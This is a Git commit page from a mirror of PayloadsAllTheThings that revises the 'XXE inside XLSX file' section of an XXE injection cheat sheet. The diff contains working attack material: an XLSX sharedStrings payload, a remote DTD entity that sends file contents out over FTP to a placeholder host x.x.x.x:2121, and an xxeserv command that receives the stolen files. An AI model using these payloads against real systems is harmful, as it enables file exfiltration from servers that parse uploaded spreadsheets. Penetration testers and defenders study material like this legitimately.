ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update XXE Injection

Browse Source 
Slight QOL improvements for the recent changes of the chapter `XXE inside XLSX file`
This commit is contained in:
Markus 2021-10-18 10:13:30 +02:00 committed by GitHub
parent 220e0efef6
commit 46aabc8c8c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
XXE Injection/README.md
View File

@ -506,21 +506,8 @@ GIF (experimental)
Structure of the XLSX: Structure of the XLSX:
``` ```
$ 7z l xxe.xlsx $ 7z l xxe.xlsx
[...]
7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs x64)
Scanning the drive for archives:
1 file, 4758 bytes (5 KiB)
Listing archive: xxe.xlsx
--
Path = xxe.xlsx
Type = zip
Physical Size = 4758
Date Time Attr Size Compressed Name Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------ ------------------- ----- ------------ ------------ ------------------------
2021-10-17 15:19:00 ..... 578 223 _rels/.rels 2021-10-17 15:19:00 ..... 578 223 _rels/.rels
@ -536,10 +523,13 @@ Physical Size = 4758
2021-10-17 15:19:00 11216 3586 9 files 2021-10-17 15:19:00 11216 3586 9 files
``` ```
Extract the excel file. Extract Excel file: `7z x -oXXE xxe.xlsx`
Rebuild Excel file:
``` ```
$ 7z x -oXXE xxe.xlsx $ cd XXE
$ 7z u ../xxe.xlsx *
``` ```
Add your blind XXE payload inside `xl/workbook.xml`. Add your blind XXE payload inside `xl/workbook.xml`.
@ -559,13 +549,6 @@ Alternativly, add your payload in `xl/sharedStrings.xml`:
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
``` ```
Rebuild the Excel file.
```
$ cd XXE
$ 7z u ../xxe.xlsx *
```
Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file. Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file.
Instead we build the document once and then change the DTD. Instead we build the document once and then change the DTD.
And using FTP instead of HTTP allows to retrieve much larger files. And using FTP instead of HTTP allows to retrieve much larger files.
@ -577,7 +560,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
``` ```
Start the FTP + HTTP server: Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv):
``` ```
$ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000